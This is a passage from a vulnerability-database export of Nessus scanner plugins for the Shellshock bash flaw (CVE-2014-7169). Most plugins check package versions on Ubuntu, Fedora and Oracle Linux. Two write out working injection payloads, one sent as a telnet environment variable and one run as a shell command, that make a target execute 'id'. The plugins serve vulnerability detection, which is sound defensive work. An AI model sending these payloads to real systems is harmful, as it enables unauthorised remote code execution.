or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(10\\.04|12\\.04|14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 10.04 / 12.04 / 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"10.04\", pkgname:\"bash\", pkgver:\"4.1-2ubuntu3.2\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"bash\", pkgver:\"4.2-2ubuntu2.3\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"bash\", pkgver:\"4.3-7ubuntu1.2\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:56", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. 
Depending on the configuration of the system, an attacker can remotely execute arbitrary code.", "cvss3": {}, "published": "2014-10-13T00:00:00", "type": "nessus", "title": "Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_CVE_2014_7169.NASL", "href": "https://www.tenable.com/plugins/nessus/78385", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78385);\n script_version(\"1.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Bash Incomplete Fix Remote Code Execution Vulnerability (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. 
Depending on\nthe configuration of the system, an attacker can remotely execute\narbitrary code.\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate updates.\");\n script_set_attribute(attribute:\"agent\", value:\"unix\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Pure-FTPd External Authentication Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and 
is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"HostLevelChecks/proto\");\n script_require_ports(\"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude('ssh_func.inc');\ninclude('telnet_func.inc');\ninclude('hostlevel_funcs.inc');\ninclude('data_protection.inc');\n\nif(sshlib::get_support_level() >= sshlib::SSH_LIB_SUPPORTS_COMMANDS ||\n get_one_kb_item('HostLevelChecks/proto') == 'local')\n enable_ssh_wrappers();\nelse disable_ssh_wrappers();\n\nvar proto = get_kb_item_or_exit('HostLevelChecks/proto');\n\nvar port = get_service(svc:\"ssh\", default:22, exit_on_fail:TRUE);\nif (!get_port_state(port)) audit(AUDIT_PORT_CLOSED, port);\n\nvar info_t;\n\nif (proto == 'local')\n info_t = INFO_LOCAL;\nelse if (proto == 'ssh')\n{\n info_t = INFO_SSH;\n var ret = ssh_open_connection();\n if (!ret) audit(AUDIT_FN_FAIL, 'ssh_open_connection');\n}\nelse\n exit(0, 'This plugin only attempts to run commands locally or via SSH, and neither is available against the remote host.');\n\n var AIX_Check = get_kb_item(\"Host/AIX/version\");\n if (!isnull(AIX_Check) && AIX_Check =~ '^AIX-[0-5].')\n {\n if(info_t == INFO_SSH) ssh_close_connection();\n exit(0, \"Commands are not supported on AIX 5.1 and below\");\n }\nelse\n var command = \"cd /tmp && X='() { (a)=>\\' bash -c 'echo /usr/bin/id' && cat /tmp/echo && rm /tmp/echo\";\n var output = info_send_cmd(cmd:command);\n\n if(info_t == INFO_SSH) ssh_close_connection();\n if (output !~ \"uid=[0-9]+.*gid=[0-9]+.*\") audit(AUDIT_HOST_NOT, \"affected.\");\n\nvar report =\n '\\n' + 'Nessus was able to exploit a flaw in the patch for CVE-2014-7169' +\n '\\n' + 'and write to a file on the target system.' 
+\n '\\n' +\n '\\n' + 'File contents :' +\n '\\n' +\n '\\n' + data_protection::sanitize_uid(output:output) +\n '\\n' +\n '\\n' + 'Note: Nessus has attempted to remove the file from the /tmp directory.\\n';\nsecurity_report_v4(port:port,extra:report,severity:SECURITY_HOLE);\n\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:42", "description": "The remote host is running a version of Bash that is vulnerable to command injection via environment variable manipulation. Depending on the configuration of the system, an attacker could remotely execute arbitrary code.", "cvss3": {}, "published": "2014-09-25T00:00:00", "type": "nessus", "title": "GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["cpe:/a:gnu:bash"], "id": "BASH_REMOTE_CODE_EXECUTION_TELNET.NASL", "href": "https://www.tenable.com/plugins/nessus/77857", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77857);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"GNU Bash Local Environment Variable Handling Command Injection via Telnet (CVE-2014-7169) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A system shell on the remote host is vulnerable to command injection.\");\n 
script_set_attribute(attribute:\"description\", value:\n\"The remote host is running a version of Bash that is vulnerable to\ncommand injection via environment variable manipulation. Depending on\nthe configuration of the system, an attacker could remotely execute\narbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update Bash.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/25\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:gnu:bash\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n 
script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"Gain a shell remotely\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"telnet.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"byte_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"telnet2_func.inc\");\ninclude(\"audit.inc\");\ninclude(\"data_protection.inc\");\n\n\nport = get_service(svc:\"telnet\", default:23, exit_on_fail:TRUE);\n\nglobal_var rcvdata;\nglobal_var cnt;\nglobal_var two_output;\n\nfunction local_telnet_callback()\n{\n local_var data, report;\n\n data = _FCT_ANON_ARGS[0];\n\n # Accumulate each byte as it's received.\n if (data && ord(data[0]) != 0x00 && ord(data[0]) != 0x0d) rcvdata += data[0];\n\n if ( 'Plugin output: 2' >< rcvdata && data[0] == '\\n' )\n {\n two_output = rcvdata;\n return -1;\n }\n\n if ( 'uid=' >< rcvdata && data[0] == '\\n' )\n {\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'id\\' command:\\n' + rcvdata;\n\n security_hole(port:port, extra:report);\n exit(0);\n }\n\n if (\"login: \" >< rcvdata || 'assword:' >< rcvdata )\n exit(0, \"The remote host is running a telnet server that is not configured to run a shell script on connect, and so it is not affected.\");\n}\n\n# Set up the environment.\ntest_command = \"echo Plugin output: $((1+1))\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, 
\"telnet\", port);\n\nrcvdata = NULL;\ntwo_output = NULL;\n\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\n# Set up the environment.\ntest_command = \"/usr/bin/id\";\nenv_data =\n mkbyte(0) +\n mkbyte(0) + \"USER\" +\n mkbyte(1) + \"() { :;}; \" + test_command;\n\noptions = NULL;\noptions[0] = make_list(OPT_NEW_ENV, env_data);\n\ncnt = 0;\n# Connect and process options.\nif (!telnet2_init(port:port, options:options, timeout:5*get_read_timeout()))\n audit(AUDIT_SVC_FAIL, \"telnet\", port);\n\nrcvdata = NULL;\ntelnet_loop(telnet_callback_fn:@local_telnet_callback);\n\nif (!isnull(two_output))\n{\n report =\n'It was possible to exploit this vulnerability by sending a malformed\nUSER environment variable to the remote server, which allowed us to\nexecute the \\'echo Plugin output: $((1+1))\\' command:\\n' + data_protection::sanitize_uid(output:two_output);\n\n security_hole(port:port, extra:report);\n exit(0);\n}\n\naudit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:06", "description": "Swapping Florian's unofficial patches for those released by bash upstream.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. 
Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-10-06T00:00:00", "type": "nessus", "title": "Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:bash"], "id": "FEDORA_2014-12202.NASL", "href": "https://www.tenable.com/plugins/nessus/78058", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-12202.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78058);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"FEDORA\", value:\"2014-12202\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Fedora 20 : bash-4.2.51-2.fc20 (2014-12202)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Swapping Florian's unofficial patches for those released by bash\nupstream.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-October/139900.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c47a82e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) 
audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"bash-4.2.51-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:43", "description": "Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : bash (ELSA-2014-3075)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:6"], "id": "ORACLELINUX_ELSA-2014-3075.NASL", "href": "https://www.tenable.com/plugins/nessus/77891", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3075.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77891);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", 
value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 6 : bash (ELSA-2014-3075)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[4.1.2-15.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004480.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 6\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.1.0.1\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:37", "description": "Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169", "cvss3": {}, "published": "2014-09-26T00:00:00", 
"type": "nessus", "title": "Oracle Linux 5 : bash (ELSA-2014-3077)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "cpe:/o:oracle:linux:5"], "id": "ORACLELINUX_ELSA-2014-3077.NASL", "href": "https://www.tenable.com/plugins/nessus/77893", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3077.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77893);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\");\n script_bugtraq_id(70137);\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 : bash (ELSA-2014-3077)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Description of changes:\n\n[3.2-33.1.0.1]\n- Preliminary fix for CVE-2014-7169\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004483.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7169\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n 
script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! 
preg(pattern:\"^5([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5.1.0.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:24:08", "description": "The remote OracleVM system is missing necessary patches to address critical security updates :\n\n - (CVE-2014-7169) Resolves: #1146322", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "OracleVM 3.3 : bash (OVMSA-2014-0021)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-7169"], "modified": "2022-01-31T00:00:00", "cpe": ["p-cpe:/a:oracle:vm:bash", "cpe:/o:oracle:vm_server:3.3"], "id": "ORACLEVM_OVMSA-2014-0021.NASL", "href": 